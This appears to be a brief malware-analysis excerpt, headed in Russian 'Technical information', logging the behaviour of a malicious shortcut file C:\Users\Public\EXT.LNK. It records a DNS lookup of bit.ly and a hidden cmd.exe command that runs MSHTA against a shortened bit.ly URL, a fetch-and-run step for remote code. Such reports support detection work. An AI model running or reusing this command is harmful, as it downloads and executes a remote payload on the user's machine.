Техническая информация
- '%WINDIR%\explorer.exe' C:\Users\Public\EXT.LNK
- C:\users\public\ext.lnk
- 'bi#.ly':443
- DNS ASK bi#.ly
- '<SYSTEM32>\cmd.exe' /C START /B MSHTA https://bit.ly/2H55J4F' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C START /B MSHTA https://bit.ly/2H55J4F
- '<SYSTEM32>\mshta.exe' https://bit.ly/2H55J4F